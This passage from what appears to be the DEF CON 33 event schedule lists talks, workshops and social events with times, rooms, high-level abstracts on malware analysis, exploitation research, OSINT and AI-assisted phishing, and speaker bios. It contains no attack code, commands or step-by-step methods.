SpeakerBio:  Adam915, DCG Dept

DEF CON Groups Global Coordinator

SpeakerBio:  Jayson E Street, DCG Dept

DEF CON Groups Global Ambassador

SpeakerBio:  Alethe Denis, DCG Dept

DEF CON Groups Dept 2nd Lead


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Thursday - 16:00-18:59 PDT


Title: DEF CON Holland Group Presents: 
Drinking with the Dutch
When: Thursday, Aug 7, 16:00 - 18:59 PDT
Where: Other / See Description

Description:

"Drinking with the Dutch" at DEF CON is a perfect moment to talk about what your favourite thing is at DEF CON, show your cool handmade badges, impress other hackers about your latest hacks, make new friends, gossip about your boss and show your cat or dog pictures.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 06:00-07:59 PDT


Title: Defcon.run
When: Friday, Aug 8, 06:00 - 07:59 PDT
Where: LVCCWest-Level1-North Lobby - Map

Description:

Defcon.run is a beloved tradition at DEF CON, bringing together hackers for a refreshing start to the day. Originally known as the DEF CON 4x5K, the event has evolved into a distributed, community-driven experience featuring fun runs and rucks across Las Vegas. Participants can choose from various routes, ranging from simple 5Ks to more ambitious distances.

For DEF CON 33, the gathering point is "The Spot" by the North Entrance of the Las Vegas Convention Center West Hall. Here, the real wild hares gather before the sun has a chance to burn up this city of sin. The runs kick off at 06:00 Thursday through Sunday! But be there early for hype talks and shenanigans. We also have a whole new Meshtastic setup and website features we're adding. There are other runs swag drops and social meetups planned throughout the day and night as well!

Whether you're a seasoned runner or looking for something different, defcon.run offers a unique way to connect with other hackers and kick off your day. For more details and to sign up, visit defcon.run.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Thursday - 06:00-07:59 PDT


Title: Defcon.run
When: Thursday, Aug 7, 06:00 - 07:59 PDT
Where: LVCCWest-Level1-North Lobby - Map

Description:

Defcon.run is a beloved tradition at DEF CON, bringing together hackers for a refreshing start to the day. Originally known as the DEF CON 4x5K, the event has evolved into a distributed, community-driven experience featuring fun runs and rucks across Las Vegas. Participants can choose from various routes, ranging from simple 5Ks to more ambitious distances.

For DEF CON 33, the gathering point is "The Spot" by the North Entrance of the Las Vegas Convention Center West Hall. Here, the real wild hares gather before the sun has a chance to burn up this city of sin. The runs kick off at 06:00 Thursday through Sunday! But be there early for hype talks and shenanigans. We also have a whole new Meshtastic setup and website features we're adding. There are other runs swag drops and social meetups planned throughout the day and night as well!

Whether you're a seasoned runner or looking for something different, defcon.run offers a unique way to connect with other hackers and kick off your day. For more details and to sign up, visit defcon.run.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 06:00-07:59 PDT


Title: Defcon.run
When: Saturday, Aug 9, 06:00 - 07:59 PDT
Where: LVCCWest-Level1-North Lobby - Map

Description:

Defcon.run is a beloved tradition at DEF CON, bringing together hackers for a refreshing start to the day. Originally known as the DEF CON 4x5K, the event has evolved into a distributed, community-driven experience featuring fun runs and rucks across Las Vegas. Participants can choose from various routes, ranging from simple 5Ks to more ambitious distances.

For DEF CON 33, the gathering point is "The Spot" by the North Entrance of the Las Vegas Convention Center West Hall. Here, the real wild hares gather before the sun has a chance to burn up this city of sin. The runs kick off at 06:00 Thursday through Sunday! But be there early for hype talks and shenanigans. We also have a whole new Meshtastic setup and website features we're adding. There are other runs swag drops and social meetups planned throughout the day and night as well!

Whether you're a seasoned runner or looking for something different, defcon.run offers a unique way to connect with other hackers and kick off your day. For more details and to sign up, visit defcon.run.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Sunday - 06:00-07:59 PDT


Title: Defcon.run
When: Sunday, Aug 10, 06:00 - 07:59 PDT
Where: LVCCWest-Level1-North Lobby - Map

Description:

Defcon.run is a beloved tradition at DEF CON, bringing together hackers for a refreshing start to the day. Originally known as the DEF CON 4x5K, the event has evolved into a distributed, community-driven experience featuring fun runs and rucks across Las Vegas. Participants can choose from various routes, ranging from simple 5Ks to more ambitious distances.

For DEF CON 33, the gathering point is "The Spot" by the North Entrance of the Las Vegas Convention Center West Hall. Here, the real wild hares gather before the sun has a chance to burn up this city of sin. The runs kick off at 06:00 Thursday through Sunday! But be there early for hype talks and shenanigans. We also have a whole new Meshtastic setup and website features we're adding. There are other runs swag drops and social meetups planned throughout the day and night as well!

Whether you're a seasoned runner or looking for something different, defcon.run offers a unique way to connect with other hackers and kick off your day. For more details and to sign up, visit defcon.run.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Saturday - 14:00-17:59 PDT


Title: Defeating Malware Evasion: Techniques and Countermeasures
When: Saturday, Aug 9, 14:00 - 17:59 PDT
Where: LVCCNorth-Level2-N258 - Map

Description:

This workshop is designed to give students the skills they need to identify and defeat common evasion techniques used by malware. It’s broken up into three hands-on modules where students will work with a range of open-source (or otherwise free) tools to dig into malicious code, examine different evasion techniques, and learn how to circumvent them to better understand how the malware operates. We’ll be using a mix of instructor-created malware samples—with full source code provided so students can analyze both the binary and the code side-by-side—and real-world samples found in the wild. By the end of the workshop, students will walk away with several malware samples, pages of code to keep digging into on their own, and a solid toolkit of techniques for breaking through typical anti-analysis and evasion tricks used in modern malware.

Speakers:Kyle "d4rksystem" Cucci,Randy Pargman

SpeakerBio:  Kyle "d4rksystem" Cucci, Staff Security Research Engineer @ Proofpoint

Kyle Cucci is a malware analyst and detection engineer with Proofpoint’s Threat Research team. Previously, he led the forensic investigations and malware research teams at a large global bank. Kyle is the author of the book "Evasive Malware: A Field Guide to Detecting, Analyzing, and Defeating Advanced Threats" and is a regular speaker at conferences, speaking on topics like malware analysis, offensive security, and security engineering. In his free time, Kyle enjoys contributing to the community via open source tooling, research, and blogging.

SpeakerBio:  Randy Pargman, Director, Threat Detection @ Proofpoint

Randy leads threat detection and engineering teams at Proofpoint, using custom dynamic sandbox systems to detect evasive malware and phishing threats that target customers around the world. He previously led threat hunting and endpoint detection engineering at Binary Defense, and investigated botnets and other cyber criminal activities as a member of the FBI Cyber Action Team and Seattle Cyber Task Force. Randy currently volunteers as a digital forensic analyst with The DFIR Report, and organizes DEATHCon, a global conference for Detection Engineering and Threat Hunting workshops.


Return to Index    -    Add to Google    -    ics Calendar file

ICSV - Saturday - 13:00-13:30 PDT


Title: Deploying Deception in Depth for ICS
When: Saturday, Aug 9, 13:00 - 13:30 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

This session will introduce the strategy of designing and deploying deception strategies across ICS environments, by leveraging and operationalizing the Mitre Engage adversarial framework. This presentation will discuss the complexities related to deploying deception within ICS environments, and how to design a deception strategy geared towards the adversaries targeting your environment. A real-world case study, focusing on APT44, will demonstrate how to implement a deception strategy for Critical Infrastructure organisations.

SpeakerBio:  Brent Muir, Google

Brent has over 18 years experience working in the cybersecurity industry. He spent 12 years working in the Australian government sector, including Law Enforcement agencies, leading national cyber teams. Following his government work, Brent led the global digital forensics and incident response team for a Fortune 500 bank. His expertise has led him to working directly with C-Suite and Crisis Management teams, handling large-scale cyber incidents, including APT-linked cyber espionage campaigns. In addition to government and financial sectors, Brent has extensive experience working in Operational Technology industries, including telecommunications and energy providers.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 12:30-13:15 PDT


Title: Diamonds Are For Hackers - Building the first fully open source and hackable Quantum Sensor
When: Saturday, Aug 9, 12:30 - 13:15 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

Learn how to build a state-of-the-art quantum sensor, no physics PhD necessary!

Quantum Technology may sound like a faraway ultra-neon cyber fever dream, and in the case of quantum computing it may be some time before we’re swapping QPUs on our laptops… But Quantum Sensing is here, and we felt the time was about right to break open this technology for all.

We designed and are releasing the first ever fully open source, hackable quantum sensor. Utilising common off the shelf parts, and a sample of Nitrogen-Vacancy Centre Diamond, we will be able to measure magnetic fields with light. We will show you how to build your own device, what tech is required, and how to get a signal from the diamond. We’ll discuss some of the use cases of these sensors, from medtech to defeating GPS jamming. Then we’ll show you how to hack with it, taking the first steps to using these sensors to infer the behaviour of a chip via magnetometry. #QuantumHackers

This talk is the main demonstration of this year’s Quantum Village Badge - an actual quantum sensor released for the International Year of Quantum. Whilst others will make you think that you need advanced degrees and an expensive lab, we’ll be building quantum sensors in our garages and pushing the limits of this brand new technology; Access All Atoms!

References:

Speakers:Mark "LargeCardinal" Carney,Victoria "V__Wave" Kumaran

SpeakerBio:  Mark "LargeCardinal" Carney

Mark is a mathematician and Quantum Hacker. Working at the bleeding edge of technology for two decades, he- a has presented on an array of topics stemming from his work on quantum information, machine learning, cryptography and cybersecurity data science. He has presented at major conferences around the world and his work was recently nominated for Innovation of the Year at the SANS Difference Makers Awards. Mark co-founded Quantum Village.

SpeakerBio:  Victoria "V__Wave" Kumaran

Victoria has been hacking her way through tech over the years, making her first software tool aged 8. Victoria has a background in product design, has paid her dues in finance, has run startups using machine learning for cybersecurity & malware analysis and was an Entrepreneurial Lead on the NSF I-Corps Program. She studied art and design at Central Saint Martins and co-founded Quantum Village.


Return to Index    -    Add to Google    -    ics Calendar file

BHV - Friday - 13:45-14:30 PDT


Title: Digital Casualties: Documenting Cyber-Induced Patient Harm in Modern Healthcare
When: Friday, Aug 8, 13:45 - 14:30 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

As healthcare systems become increasingly digitized, cyber incidents like ransomware attacks and EHR outages are no longer just IT problems—they're potential contributors to patient harm and mortality. This expert panel explores the groundbreaking proposal to adapt disaster-related death certification frameworks to document cyber incidents as secondary causes of death. Bringing together expertise in cybersecurity governance, healthcare economics, investigative journalism, and clinical practice, panelists will examine the policy implications, implementation challenges, and public health benefits of standardizing how we document and track cyber-induced patient harm.

Speakers:Jorge Acevedo Canabal,Scott Shackleford,Joseph Davis

SpeakerBio:  Jorge Acevedo Canabal

Dr. Jorge Acevedo Canabal is a physician and cybersecurity researcher focused on digital threats to patient safety. He helped lead Puerto Rico’s post-Maria disaster death certification training and now proposes attributing cyberattacks as a cause of death in modern healthcare.

Joseph has 30+ years of experience in security, privacy, risk, and compliance for Fortune 500 companies. As a Customer Security Officer at Microsoft, he advises US Health and Life Sciences customers on cybersecurity, data privacy, risk management, and information compliance

SpeakerBio:  Scott Shackleford
No BIO available
SpeakerBio:  Joseph Davis
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

BHV - Saturday - 15:00-15:30 PDT


Title: Digital First Responders: Fixing Patient Safety Gaps with Smart Tech & AI
When: Saturday, Aug 9, 15:00 - 15:30 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

"Hospitals and trauma centers face critical delays in triage, patient monitoring, and shift handoffs—leading to avoidable medical errors, increased wait times, and compromised patient safety. What if AI-powered triage, biometrics, and AI-driven simulation labs could change that? This talk explores how biometric AI, smart bedside displays, digital handoff systems, and AI physiology simulations can enhance emergency care, reduce human error, and revolutionize medical training. Key Innovations We’ll Unpack: 1. AI-Facial Recognition: Upon entry to the hospital/facility, AI-powered sensors take a real-time picture of each patient as they walk/check into the ED and sync the biometric picture with their Medical Record Number (MRN) patient chart. 2. AI-Powered Biometric Triage: AI sensors continue to scan patients in the waiting room, analyzing vital signs (HR, respiratory rate, O2 sat, temp), non-verbal distress like bleeding (trauma), pain based on facial droop (Stroke), chest pain or shortness of breath (Heart Attack), syncope, labor/delivery, and grimacing (pain), and factor all these into the Emergency Severity Index (ESI) algorithm for a real-time comprehensive display to triage staff for their review. 3. Digital Handoff Reporting: Automated shift changes summaries ensure that critical patient data like medical and surgical history, labs, vital trends, pending orders, isolation precautions, and risk factors are not lost between clinicians. It also reduces paper waste, redundancy, and inefficiencies like report duration. 4. Digital Smart Room Display (i.e. TV): Like at a nice hotel room, your patient room tv would provide you with a personalized channel with your real-time medical updates (aka tv medical chart), that are approved by your providers, that are synced to your EHR chart and secured with a personalized pin you created during registration. Upon discharge of the hospital, your channel would be deactivated. This would enhance the time from provider-to-patient communication, decrease patient wait times for results, and ensure healthcare treatment transparency. It is optional and on-demand for the patient and family if consent is given by the patient. 5. AI Physiology in Simulation Labs: AI-driven simulated patient models that replicate real-time human physiology, responses to trauma, medication interactions, and disease progression—transforming medical education. 6. Cybersecurity in AI-Driven Emergency Care: Protecting biometric patient data, preventing AI hallucinations and poisoning, and securing AI-driven training systems. By integrating AI-driven biometrics, automating bedside displays and handoff reports, and AI physiology in healthcare, we can prioritize critical patients faster, reduce handoff errors, and accelerate healthcare education. The future of emergency care isn’t just faster, it’s predictive, automated, and cybersecure.

SpeakerBio:  Jennifer Schieferle Uhlenbrock

Dr. Jennifer Schieferle Uhlenbrock has 20+ years of healthcare experience. She bridges clinical practice, business, and cybersecurity best practices. A published technical writer and speaker, she translates complex security and patient safety challenges into clear, actionable insights.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 16:30-17:15 PDT


Title: Direct Memory, Access Everywhere
When: Saturday, Aug 9, 16:30 - 17:15 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

DMA vulnerabilities aren't new - but they don't seem to have gone anywhere. In the time software attacks have gone from a single bug to a multi-stage exploit chain, DMA attacks have gone from slipping some hardware into an internal slot of a computer to... plugging in an external device?

Despite decades of attacks, tooling, and even mitigations, most systems are still wide open to these attacks because of their perceived difficulty, poor system configuration, and lack of effective testing mechanisms.

Epic Erebus is a new tool that tries to address these issues. It's small, portable, and easy to use. It can slip through most systems unless the hardware, bios, and operating system are properly configured (a rarity). Finally, it's an entirely open PCIe implementation that gives you full control over Transaction Layer Packets - allowing you to reverse engineer the PCIe Bus and the DMA mitigations in place (Get it? RE-Bus... Erebus!)

You should come away understanding what erebus is capable of, the basics of how to use it, and what to look out for when properly implementing DMA attack mitigations.

References:

Speakers:Joe "securelyfitz" FitzPatrick,Grace "Baelfire" Parrish

SpeakerBio:  Joe "securelyfitz" FitzPatrick

Joe FitzPatrick (@securelyfitz) is a Trainer and Researcher at SecuringHardware.com (@securinghw). Joe has spent most of his career working on low-level silicon debug, security validation, and penetration testing of CPUs, SoCs, and microcontrollers. He has spent decades developing and delivering hardware security related tools and training, instructing hundreds of security researchers, pen testers, and hardware validators worldwide. When not teaching Applied Physical Attacks training, Joe is busy developing new course content or working on contributions to the NSA Playset and other misdirected hardware projects, which he regularly presents at all sorts of fun conferences.

SpeakerBio:  Grace "Baelfire" Parrish

Grace Parrish (@BaelfireNightshd@infosec.exchange) is in her final year of a cybersecurity degree at Oregon State University. Grace has spent much of her career working with industrial control systems but has also dabbled in electrical engineering, FPGAs, microcontrollers, and a quick decade as a board level repair technician. In her spare time as a student, she has served as the team captain for a pentesting competition, has written custom Binary Ninja plugins, and has helped deliver hardware security training at Black Hat. Grace is looking forward to working in the offensive security space once she completes her degree.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 14:00-14:45 PDT


Title: DisguiseDelimit: Exploiting Synology NAS with Delimiters and Novel Tricks
When: Friday, Aug 8, 14:00 - 14:45 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

Network Attached Storage (NAS) devices are indispensable in many corporate and home environments. These devices often live on the network edge, providing convenient remote access to confidential files and internal networks from the public internet. What happens when this goes terribly wrong?

In this presentation, I’ll discuss how I developed a zero-day exploit targeting dozens of Synology NAS products. At the time of discovery, the exploit facilitated unauthenticated root-level remote code execution on millions of NAS devices in the default configuration. My exploitation strategy centered around smuggling different types of delimiters that targeted multiple software components.

In the past, exploitation of the vulnerability’s bug class demanded additional primitives that weren’t available on my targets. While searching for alternative paths, I discovered a novel remote Linux exploitation technique. I’ll be presenting this technique, which can be used in other researchers’ exploit chains in the future. For the first time in public, I’ll also be discussing the details of my Synology vulnerability research, which won a $40,000 prize at the October 2024 Pwn2Own competition.

References:

I referenced these previous Synology offensive publications during my research:

SpeakerBio:  Ryan Emmons

Ryan Emmons is a Security Researcher on the Emergent Threat Response team at Rapid7. His work centers around n-day analysis of new vulnerabilities and zero-day research, primarily focused on network edge devices. Ryan enjoys attacking hardened targets and finding interesting bugs. He has disclosed vulnerabilities to major vendors like Oracle and Microsoft, and he recently competed at the 2024 Pwn2Own Ireland competition, where he won a $40,000 prize. In addition to vulnerability research, Ryan likes to participate in CTF competitions and compose music.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Sunday - 09:00-12:59 PDT


Title: Disrupting Digital Dataflows: A 101 on how 2 detect, analyze, & disrupt digital systems by reverse engineering real-world Electronic Warfare techniques from Ukraine at the hardware level
When: Sunday, Aug 10, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N257 - Map

Description:

This hands-on technical training dives deep into the mechanics and mitigation of signal jamming—an increasingly critical threat in both civilian and military communication systems. Attendees will explore the electromagnetic spectrum, modulation techniques, and the physical principles that enable signal jamming. We will analyze common types of jammers, their circuitry, and how they disrupt RF communications. Participants will also gain insight into detection methods, spectrum analysis, and counter-jamming strategies using SDRs and directional antennas. The course balances theory and practice, with live demonstrations and dissection of real-world jamming scenarios. Prior familiarity with RF fundamentals and basic electronics is helpful but not required. To get the most from this session, attendees are encouraged to review basic electromagnetic theory and brush up on SDR tools like GNU Radio or SDR# ahead of time. This session is ideal for cybersecurity professionals, drone operators, RF engineers, and technical hobbyists seeking to understand and combat one of the most disruptive tools in electronic warfare.

SpeakerBio:  Preston Zen, 1337sheets.com

Preston Zen is a OSCE3 Cybersecurity Certified maker and breaker of all things technology from custom electronics to bespoke software. Humanitarian volunteer in Ukraine since 2022 in logistics and engineering as well as one of the leading innovators of field implemented technology use cases


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Friday - 14:00-17:59 PDT


Title: Dive into Windows Library Loading
When: Friday, Aug 8, 14:00 - 17:59 PDT
Where: LVCCNorth-Level2-N258 - Map

Description:

DLL Loading is one of the most important parts of the Windows system. When you install, run, use, or hack a system, you will always use DLL. This DLL mechanism has been exploited for several years for malware development through several techniques : DLL injection, Reflective DLL but do you really know how Windows is loading a DLL ? The sections used, the internal structures and how the dependencies are resolved. Are you able to design your own Perfect DLL Loader that fully integrate with the WIN32API? In this workshop, you will dive into the Windows DLL mechanism to understand how all of it works internally. With a decompiler, trial and errors, step by step, you will build your own (almost) Perfect DLL loader. You will try to load from the simple AMSI.DLL to the most complex WINHTTP.DLL. At each step, you will dive deeper into the Windows Internals. Malware developers, you will be able to use this code as a PE loader that never failed me for the last years and a DLL loader that does not raise the LoadImage kernel callback you can use on your own C2 beacon. WARNING: while this is a windows internal DISCOVERY course, it is still a HIGHLY TECHNICAL workshop. You should have some entry-level knowledge on Windows systems, C programing and reverse engineering to fully enjoy the workshop.

SpeakerBio:  Yoann "OtterHacker" DEQUEKER, RedTeam Leader at Wavestonee

Yoann Dequeker (@OtterHacker) is a red team operator at Wavestone entitle with OSCP and CRTO certification. Aside from his RedTeam engagements and his contributions to public projects such as Impacket, he spends time working on Malware Developpement to ease beacon deployment and EDR bypass during engagements and is currently developing a fully custom C2.

His research leads him to present his results on several conferences such as LeHack (Paris), Insomni'hack, BlackAlps (Swiss) or even through a 4-hour malware workshop at Defcon31 and Defcon32 (Las Vegas). All along the year, he publishes several white papers on the techniques he discovered or upgraded and the vulnerabilities he found on public products.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Sunday - 09:00-12:59 PDT


Title: DIY Malware Emulation: Build It, Break It, Detect It
When: Sunday, Aug 10, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N252 - Map

Description:

Real threats leave behind real artifacts — and in this hands-on workshop, we’ll combine malware development and analysis by safely recreating and dissecting a custom malware based on Lumma Stealer, one of today’s most active malware families. This approach is designed to support adversary emulation efforts by replicating real-world TTPs in a controlled environment, while also teaching participants how to detect and analyze each technique. Whether you're on a red or purple team looking to simulate attacker behavior, or on a blue team aiming to strengthen detection capabilities, this workshop delivers practical skills grounded in real-world threats.

Speakers:Sebastian Tapia,Ricardo Sanchez

SpeakerBio:  Sebastian Tapia

Sebastian breaks things to understand them—and sometimes to teach others how to do it better. He’s spent years in red teaming, malware reversing, and purple team exercises—learning how attackers think, and how defenders can think better. These days, he builds labs, breaks code, and shares what he learns so others can level up, too.

SpeakerBio:  Ricardo Sanchez

Ricardo Sanchez is an accomplished cybersecurity professional with a passion for empowering others through knowledge sharing. As a Security Architect at one of Peru's leading insurance companies, he specializes in designing innovative technology strategies for threat intelligence, detection engineering, and threat hunting to combat evolving cyber threats. Committed to lifelong learning, Ricardo thrives on analyzing malware and staying at the forefront of cybersecurity advancements.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 11:00-16:50 PDT


Title: DNS-Based OSINT Tactics for Product and Service Discovery
When: Saturday, Aug 9, 11:00 - 16:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Tactics 3 - Map

Description:

As a London-based security researcher with a strong focus on open-source intelligence (OSINT) and attack surface discovery, I am excited to attend the DEF CON conference for the first time and contribute meaningfully to the Red Team Village. My passion lies in developing and refining reconnaissance techniques that enable both offensive and defensive practitioners to gain deeper insights into an organization’s digital footprint.

During the RTV Tactics sessions, I will present a DNS-based OSINT methodology for uncovering products and services through large-scale DNS TXT record scanning. This previously unpublished approach demonstrates how certain TXT records can reveal not just domain ownership or validation details, but also the presence of specific third-party services and platforms in use. For instance, TXT entries like google-site-verification, MS=msXXXXXXXX, or vendor-specific SPF includes can expose dependencies on Google Workspace, Microsoft 365, or other cloud-based services.

By programmatically analyzing these records across large swaths of DNS zones, attackers can construct detailed maps of an organization's technology stack and supply chain affiliations—critical intelligence for targeted campaigns. This intelligence also provides defenders with an opportunity to detect inadvertent information leakage and improve control over external DNS configurations.

To support operational use, I have integrated this scanning technique into widely adopted open-source tools such as Nuclei and Amass. These enhancements allow red teams and security researchers to efficiently incorporate TXT record reconnaissance into broader discovery workflows, elevating the precision and depth of traditional enumeration phases.

This session will equip attendees with practical, reproducible tactics for passive and semi-active discovery that can uncover non-obvious attack vectors. Attendees will leave with actionable insights and tooling that can be immediately applied to real-world engagements.

It would be an absolute honor to support the Red Team Village and give back to a community that has been instrumental in shaping my growth as a researcher. I deeply value the Village’s mission to educate, inspire, and empower red teamers of all experience levels, and I am eager to contribute to that mission by sharing knowledge that enhances our collective offensive capabilities and understanding of adversarial tradecraft. Thank you for the opportunity to be considered.

SpeakerBio:  Rishi "rxerium" Chudasama

Rishi Chudasama is a London-based security researcher with over five years of hands-on experience in IT. He currently specializes in vulnerability research, threat intelligence, and enterprise risk analysis. His current focus lies in identifying and analyzing zero-day vulnerabilities and emerging CVEs, often working to reverse engineer exploit mechanics and build detection logic before public weaponization. Rishi’s work spans both offensive and defensive domains—developing threat models based on real-world TTPs, crafting custom detection rules, and automating reconnaissance pipelines to uncover exploitable misconfigurations and exposed assets. He is particularly active in attack surface management (ASM) and OSINT, where he leverages DNS enumeration, passive data correlation, and large-scale infrastructure scanning to surface unknown entry points and map adversary-accessible exposure. Outside of research, Rishi integrates findings into operational tooling and supports data-driven prioritization strategies to bridge technical risk and business impact. His work reflects a deep commitment to adversary-informed defense and proactive discovery across modern hybrid environments.


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Saturday - 12:00-12:30 PDT


Title: Do Scammers dream of electric Phish? Lessons learned from deploying AI-driven phishing ops
When: Saturday, Aug 9, 12:00 - 12:30 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

Effective phishing campaigns traditionally demand extensive manual effort, involving detailed target reconnaissance, crafting believable scenarios, and setting up infrastructure. These manual processes significantly restrict scalability and customization. This talk explores a practical approach to leveraging Generative AI for automating core aspects of phishing workflows, drawing on direct experiences and real-world threat actors such as Emerald Sleet, Crimson Sandstorm, and Charcoal Typhoon.

The session thoroughly compares results from different models and platforms, including OpenAI ChatGPT, Anthropic Claude, and local alternatives, highlighting distinct strengths, weaknesses, and techniques for optimizing outcomes. Attendees will gain insights into deploying an end-to-end phishing campaign, emphasizing the models' effectiveness in reducing the technical barrier of scaling phishing attacks. Finally, the talk underscores that while AI significantly enhances operational efficiency, it functions best when complemented by human judgment and expertise, reinforcing the critical human factor in cybersecurity practices.

SpeakerBio:  Daniel Marques

With over 15 years in offensive security, Daniel applies a strong software development and networking background to help Fortune 500 companies identify and remediate vulnerabilities in various technologies, including corporate networks, applications, and smart devices. With more than 15 years of experience in Cybersecurity, prominent local and international security conferences such as HOU.SEC.CON, ISC2 Security Congress, and Black Hat Regional Summit featured his Offensive Security research. Daniel holds a B.Sc. in Computer Science and an M.Sc. in Cybersecurity. In 2019, Daniel was part of the team that won the DEF CON Biohacking Village Capture the Flag competition.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Dodging the EDR bullet: A Training on Malware Stealth Tactics
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

"Dodging the EDR bullet" Training is an intensive, hands-on course designed to equip cybersecurity professionals with cutting-edge skills in malware evasion techniques. Dive deep into Windows security components, antivirus systems, and EDRs while mastering the full malware lifecycle—from initial access to advanced in-memory evasion and kernel-level persistence. Through a systematic approach to memory management and process manipulation, participants will learn how to bypass modern detection strategies and build stealthy malware components. The course focuses on cultivating a research-driven mindset, enabling attendees to understand and analyze detection strategies provided by the Windows OS and then craft their own techniques to evade them.

By the end of the training, participants will have gained a solid foundation in malware analysis and development, enabling them to craft sophisticated command-and-control (C2) payloads and maintain persistence while remaining undetected.

* All students are expected to sign an NDA with the trainer to avoid unauthorized sharing of training materials *

Speakers:Giorgio "gbyolo" Bernardinetti,Dimitri "GlenX" Di Cristofaro

SpeakerBio:  Giorgio "gbyolo" Bernardinetti, Lead Researcher at System Security division of CNIT

Giorgio "gbyolo" Bernardinetti is lead researcher at the System Security division of CNIT. His research activities are geared towards Red Teaming support activities, in particular design and development of advanced evasion techniques in strictly monitored environments, with emphasis on (but not limited to) the Windows OS, both in user-space and kernel-space. He has been a speaker for DEFCON32 Workshops and Red Team Village HacktivityCon 2021.

SpeakerBio:  Dimitri "GlenX" Di Cristofaro, Security Consultant and Researcher at SECFORCE LTD

Dimitri "GlenX" Di Cristofaro is a security consultant and researcher at SECFORCE LTD where he performs Red Teams on a daily basis. The main focus of his research activities is about Red Teaming and in particular on identifying new ways of attacking operating systems and looking for cutting edge techniques to increase stealthiness in strictly monitored environments. He enjoys malware writing and offensive tools development as well as producing electronic music in his free time.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Dodging the EDR bullet: A Training on Malware Stealth Tactics
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

"Dodging the EDR bullet" Training is an intensive, hands-on course designed to equip cybersecurity professionals with cutting-edge skills in malware evasion techniques. Dive deep into Windows security components, antivirus systems, and EDRs while mastering the full malware lifecycle—from initial access to advanced in-memory evasion and kernel-level persistence. Through a systematic approach to memory management and process manipulation, participants will learn how to bypass modern detection strategies and build stealthy malware components. The course focuses on cultivating a research-driven mindset, enabling attendees to understand and analyze detection strategies provided by the Windows OS and then craft their own techniques to evade them.

By the end of the training, participants will have gained a solid foundation in malware analysis and development, enabling them to craft sophisticated command-and-control (C2) payloads and maintain persistence while remaining undetected.

* All students are expected to sign an NDA with the trainer to avoid unauthorized sharing of training materials *

Speakers:Giorgio "gbyolo" Bernardinetti,Dimitri "GlenX" Di Cristofaro

SpeakerBio:  Giorgio "gbyolo" Bernardinetti, Lead Researcher at System Security division of CNIT

Giorgio "gbyolo" Bernardinetti is lead researcher at the System Security division of CNIT. His research activities are geared towards Red Teaming support activities, in particular design and development of advanced evasion techniques in strictly monitored environments, with emphasis on (but not limited to) the Windows OS, both in user-space and kernel-space. He has been a speaker for DEFCON32 Workshops and Red Team Village HacktivityCon 2021.

SpeakerBio:  Dimitri "GlenX" Di Cristofaro, Security Consultant and Researcher at SECFORCE LTD

Dimitri "GlenX" Di Cristofaro is a security consultant and researcher at SECFORCE LTD where he performs Red Teams on a daily basis. The main focus of his research activities is about Red Teaming and in particular on identifying new ways of attacking operating systems and looking for cutting edge techniques to increase stealthiness in strictly monitored environments. He enjoys malware writing and offensive tools development as well as producing electronic music in his free time.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Friday - 17:50-18:20 PDT


Title: Domain Fronting in 2025: a retro analysis
When: Friday, Aug 8, 17:50 - 18:20 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Tom Cope
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 16:00-16:50 PDT


Title: Don the Mantle: Red Team Campaign Planning and Execution with MITRE ATT&CK
When: Saturday, Aug 9, 16:00 - 16:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 1 - Map

Description:

This workshop will provide participants with the necessary knowledge to plan and execute red team exercises that accurately emulate real-world threat actors. Using MITRE ATT&CK as a foundation, attendees will learn how to map adversary tactics, techniques, and procedures (TTPs) to red team operations, ensuring realism down to the indicator of compromise (IOC) level. The workshop culminates with the hands-on development of a red team campaign to emulate an advanced persistent threat (APT) group. For this exercise, participants will receive simulated exercise objectives and rules of engagement and will use presented techniques to develop a basic red team campaign plan for successfully emulating the selected threat group.

SpeakerBio:  William Giles

William (Billy) Giles is an Offensive Security leader and practitioner who specializes in red/purple teaming, adversary emulation, and network penetration testing. With a deep passion for understanding and simulating adversary behaviors, he helps organizations across a multitude of industries assess their security postures, identify and remediate vulnerabilities, and build stronger defenses by thinking like an attacker.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 12:00-12:50 PDT


Title: Don't be LLaMe - The basics of attacking LLMs in your Red Team exercises
When: Friday, Aug 8, 12:00 - 12:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 2 - Map

Description:

